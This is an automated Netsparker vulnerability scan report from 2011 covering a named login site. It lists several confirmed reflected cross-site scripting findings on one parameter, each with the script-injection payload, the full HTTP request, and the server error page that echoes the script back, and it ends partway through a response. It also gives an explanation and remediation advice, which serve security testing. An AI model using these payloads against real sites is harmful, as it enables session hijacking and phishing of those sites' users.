XSS, Cross Site Scripting, Javascript Injection, login1.vtrenz.net, CWE-79, CAPEC-86
Netsparker - Scan Report Summary
|
TARGET URL
|
https://login1.vtrenz.net/
|
SCAN DATE
|
3/8/2011 5:06:58 AM
|
REPORT DATE
|
3/8/2011 5:40:38 AM
|
SCAN DURATION
|
00:14:02
|
|
Total Requests
Average Speed
req/sec.
|
14
identified
11
confirmed
0
critical
2
informational
|
GHDB, DORK Tests
GHDB, DORK Tests
|
PROFILE
|
Previous Settings
|
ENABLED ENGINES
|
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
|
|
Authentication
Scheduled
|
VULNERABILITIES
Vulnerabilities
|
|
|
Cross-site Scripting
Cross-site Scripting
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (
Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.
XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.
Impact
There are many different attacks that can be leveraged through the use of XSS, including:
- Hi-jacking users' active session
- Changing the look of the page within the victims browser.
- Mounting a successful phishing attack.
- Intercept data and perform man-in-the-middle attacks.
The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.
Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.
There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.
External References
- /index.cfm
/index.cfm
CONFIRMED
|
Parameters
Parameter
|
Type
|
Value
|
method
|
GET
|
'"--></style></script><script>alert(0x000A4B)</script>
|
login
|
POST
|
3
|
password
|
POST
|
3
|
submit
|
POST
|
3
|
Request
POST /index.cfm?method='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000A4B)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 27
Accept-Encoding: gzip, deflate
login=3&password=3&submit=3
Response
HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:06:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sorry! An error has occured.</title>
<style>
.errorHeader{
font-family:Arial, Helvetica, sans-serif;
font-weight:bold;
color:#000000;
font-size:14px;
background-color:#f2f2f2;
padding:4px;
border:1px solid #cccccc;
}
.errorText{
font-family:Arial, Helvetica, sans-serif;
font-size:11px;
padding:4px;
}
.errorFooter{
font-family:Arial, Helvetica, sans-serif;
color:#999999;
font-size:11px;
background-color:#f2f2f2;
padding:2px;
border:1px solid #cccccc;
}
</style>
</head>
<body>
<table cellpadding="0" cellspacing="0" border="0" width="585" align="center">
<tr>
<td align="left" valign="middle" class="errorHeader">An Error Has Occurred.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">An unknown error occurred while attempting to process your request.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">
<br>
If you continue to recieve this error and would like further assistance, please send an email
to <a href="mailto: <!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>
<font face="arial"></font>
<html>
<head>
<title>Error Occurred While Processing Request</title>
<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}
if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>
</head>
<body>
<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.
</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">
<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
malformed Fuseaction
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You specified a malformed Fuseaction of '"--></style></script><script>netsparker(0x000A4B)</script>. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
</font>
</td>
</tr>
<tr>
<td height> </td>
</tr>
<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>
<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>
</ul>
<p>
</td>
</tr>
<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">10.120.0.37</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://login1.vtrenz.net/</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">08-Mar-11 06:06 AM</td>
</tr>
</table>
</td>
</tr>
</table>
</font>
</td>
</tr>
</table>
</body></html>
- /index.cfm
/index.cfm
CONFIRMED
|
Parameters
Parameter
|
Type
|
Value
|
method
|
GET
|
'"--></style></script><script>alert(0x000AC8)</script>
|
login
|
POST
|
3
|
password
|
POST
|
3
|
Request
POST /index.cfm?method='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000AC8)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 18
Accept-Encoding: gzip, deflate
login=3&password=3
Response
HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:06:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sorry! An error has occured.</title>
<style>
.errorHeader{
font-family:Arial, Helvetica, sans-serif;
font-weight:bold;
color:#000000;
font-size:14px;
background-color:#f2f2f2;
padding:4px;
border:1px solid #cccccc;
}
.errorText{
font-family:Arial, Helvetica, sans-serif;
font-size:11px;
padding:4px;
}
.errorFooter{
font-family:Arial, Helvetica, sans-serif;
color:#999999;
font-size:11px;
background-color:#f2f2f2;
padding:2px;
border:1px solid #cccccc;
}
</style>
</head>
<body>
<table cellpadding="0" cellspacing="0" border="0" width="585" align="center">
<tr>
<td align="left" valign="middle" class="errorHeader">An Error Has Occurred.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">An unknown error occurred while attempting to process your request.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">
<br>
If you continue to recieve this error and would like further assistance, please send an email
to <a href="mailto: <!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>
<font face="arial"></font>
<html>
<head>
<title>Error Occurred While Processing Request</title>
<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}
if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>
</head>
<body>
<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.
</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">
<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
malformed Fuseaction
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You specified a malformed Fuseaction of '"--></style></script><script>netsparker(0x000AC8)</script>. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
</font>
</td>
</tr>
<tr>
<td height> </td>
</tr>
<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>
<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>
</ul>
<p>
</td>
</tr>
<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">10.120.0.37</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://login1.vtrenz.net/</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">08-Mar-11 06:06 AM</td>
</tr>
</table>
</td>
</tr>
</table>
</font>
</td>
</tr>
</table>
</body></html>
- /index.cfm
/index.cfm
CONFIRMED
|
Parameters
Parameter
|
Type
|
Value
|
method
|
GET
|
'"--></style></script><script>alert(0x000AE9)</script>
|
login
|
POST
|
3
|
password
|
POST
|
3
|
submit.x
|
POST
|
0
|
submit.y
|
POST
|
0
|
Request
POST /index.cfm?method='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000AE9)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 40
Accept-Encoding: gzip, deflate
login=3&password=3&submit.x=0&submit.y=0
Response
HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:07:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sorry! An error has occured.</title>
<style>
.errorHeader{
font-family:Arial, Helvetica, sans-serif;
font-weight:bold;
color:#000000;
font-size:14px;
background-color:#f2f2f2;
padding:4px;
border:1px solid #cccccc;
}
.errorText{
font-family:Arial, Helvetica, sans-serif;
font-size:11px;
padding:4px;
}
.errorFooter{
font-family:Arial, Helvetica, sans-serif;
color:#999999;
font-size:11px;
background-color:#f2f2f2;
padding:2px;
border:1px solid #cccccc;
}
</style>
</head>
<body>
<table cellpadding="0" cellspacing="0" border="0" width="585" align="center">
<tr>
<td align="left" valign="middle" class="errorHeader">An Error Has Occurred.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">An unknown error occurred while attempting to process your request.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">
<br>
If you continue to recieve this error and would like further assistance, please send an email
to <a href="mailto: <!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>
<font face="arial"></font>
<html>
<head>
<title>Error Occurred While Processing Request</title>
<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}
if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>
</head>
<body>
<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.
</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">
<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
malformed Fuseaction
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You specified a malformed Fuseaction of '"--></style></script><script>netsparker(0x000AE9)</script>. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
</font>
</td>
</tr>
<tr>
<td height> </td>
</tr>
<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>
<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>
</ul>
<p>
</td>
</tr>
<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">10.120.0.37</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://login1.vtrenz.net/</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">08-Mar-11 06:07 AM</td>
</tr>
</table>
</td>
</tr>
</table>
</font>
</td>
</tr>
</table>
</body></html>
- /index.cfm
/index.cfm
CONFIRMED
|
Parameters
Parameter
|
Type
|
Value
|
method
|
GET
|
'"--></style></script><script>alert(0x000B37)</script>
|
login
|
POST
|
3
|
submit
|
POST
|
3
|
Request
POST /index.cfm?method='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B37)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 16
Accept-Encoding: gzip, deflate
login=3&submit=3
Response
HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:09:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sorry! An error has occured.</title>
<style>
.errorHeader{
font-family:Arial, Helvetica, sans-serif;
font-weight:bold;
color:#000000;
font-size:14px;
background-color:#f2f2f2;
padding:4px;
border:1px solid #cccccc;
}
.errorText{
font-family:Arial, Helvetica, sans-serif;
font-size:11px;
padding:4px;
}
.errorFooter{
font-family:Arial, Helvetica, sans-serif;
color:#999999;
font-size:11px;
background-color:#f2f2f2;
padding:2px;
border:1px solid #cccccc;
}
</style>
</head>
<body>
<table cellpadding="0" cellspacing="0" border="0" width="585" align="center">
<tr>
<td align="left" valign="middle" class="errorHeader">An Error Has Occurred.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">An unknown error occurred while attempting to process your request.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">
<br>
If you continue to recieve this error and would like further assistance, please send an email
to <a href="mailto: <!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>
<font face="arial"></font>
<html>
<head>
<title>Error Occurred While Processing Request</title>
<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}
if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>
</head>
<body>
<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.
</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
The following information is meant for the website developer for debugging purposes.
</font>
</td>
<tr>
<tr>
<td bgcolor="#4646EE">
<font style="COLOR: white; FONT: 11pt/13pt verdana" color="white">
Error Occurred While Processing Request
</font>
</td>
</tr>
<tr>
<td>
<font style="COLOR: black; FONT: 8pt/11pt verdana">
<table width="500" cellpadding="0" cellspacing="0" border="0">
<tr>
<td id="tableProps2" align="left" valign="middle" width="500">
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
malformed Fuseaction
</h1>
</td>
</tr>
<tr>
<td id="tablePropsWidth" width="400" colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
You specified a malformed Fuseaction of '"--></style></script><script>netsparker(0x000B37)</script>. A fully qualified Fuseaction must be in the form [Circuit].[Fuseaction].
</font>
</td>
</tr>
<tr>
<td height> </td>
</tr>
<tr>
<td colspan="2">
<font style="COLOR: black; FONT: 8pt/11pt verdana">
Resources:
<ul>
<li>Enable Robust Exception Information to provide greater detail about the source of errors. In the Administrator, click Debugging & Logging > Debug Output Settings, and select the Robust Exception Information option.</li>
<li>Check the <a href='http://www.macromedia.com/go/proddoc_getdoc' target="new">ColdFusion documentation</a> to verify that you are using the correct syntax.</li>
<li>Search the <a href='http://www.macromedia.com/support/coldfusion/' target="new">Knowledge Base</a> to find a solution to your problem.</li>
</ul>
<p>
</td>
</tr>
<tr>
<td colspan="2">
<table border="0" cellpadding="0" cellspacing="0">
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Browser </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Remote Address </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">10.120.0.37</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Referrer </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval</td>
</tr>
<tr>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">Date/Time </td>
<td><font style="COLOR: black; FONT: 8pt/11pt verdana">08-Mar-11 06:09 AM</td>
</tr>
</table>
</td>
</tr>
</table>
</font>
</td>
</tr>
</table>
</body></html>
- /index.cfm
/index.cfm
CONFIRMED
|
Parameters
Parameter
|
Type
|
Value
|
method
|
GET
|
'"--></style></script><script>alert(0x000B63)</script>
|
login
|
POST
|
3
|
Request
POST /index.cfm?method='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B63)%3C/script%3E HTTP/1.1
Referer: https://login1.vtrenz.net/index.cfm?method=cLoginModule.displayPWDRetrieval
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: login1.vtrenz.net
Cookie: JSESSIONID=3c301ea994f00549756f634f3220e631d502TR
Content-Length: 7
Accept-Encoding: gzip, deflate
login=3
Response
HTTP/1.1 500 Server Error
Connection: close
Date: Tue, 08 Mar 2011 11:10:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Sorry! An error has occured.</title>
<style>
.errorHeader{
font-family:Arial, Helvetica, sans-serif;
font-weight:bold;
color:#000000;
font-size:14px;
background-color:#f2f2f2;
padding:4px;
border:1px solid #cccccc;
}
.errorText{
font-family:Arial, Helvetica, sans-serif;
font-size:11px;
padding:4px;
}
.errorFooter{
font-family:Arial, Helvetica, sans-serif;
color:#999999;
font-size:11px;
background-color:#f2f2f2;
padding:2px;
border:1px solid #cccccc;
}
</style>
</head>
<body>
<table cellpadding="0" cellspacing="0" border="0" width="585" align="center">
<tr>
<td align="left" valign="middle" class="errorHeader">An Error Has Occurred.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">An unknown error occurred while attempting to process your request.</td>
</tr>
<tr>
<td align="left" valign="middle" class="errorText">
<br>
If you continue to recieve this error and would like further assistance, please send an email
to <a href="mailto: <!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></CODE></COMMENT></DEL></DFN></DIR></DIV></DL></EM></FIG></FN></FONT></FORM></FRAME></FRAMESET></H1></H2></H3></H4></H5></H6></HEAD></I></INS></KBD></LISTING></MAP></MARQUEE></MENU></MULTICOL></NOBR></NOFRAMES></NOSCRIPT></NOTE></OL></P></PARAM></PERSON></PLAINTEXT></PRE></Q></S></SAMP></SCRIPT></SELECT></SMALL></STRIKE></STRONG></SUB></SUP></TABLE></TD></TEXTAREA></TH></TITLE></TR></TT></U></UL></VAR></WBR></XMP>
<font face="arial"></font>
<html>
<head>
<title>Error Occurred While Processing Request</title>
<script language="JavaScript">
function showHide(targetName) {
if( document.getElementById ) { // NS6+
target = document.getElementById(targetName);
} else if( document.all ) { // IE4+
target = document.all[targetName];
}
if( target ) {
if( target.style.display == "none" ) {
target.style.display = "inline";
} else {
target.style.display = "none";
}
}
}
</script>
</head>
<body>
<font style="COLOR: black; FONT: 16pt/18pt verdana">
The web site you are accessing has experienced an unexpected error.<br>
Please contact the website administrator.
</font>
<br><br>
<table border="1" cellpadding="3" bordercolor="#000808" bgcolor="#e7e7e7">
<tr>
<td bgcolor="#000066">
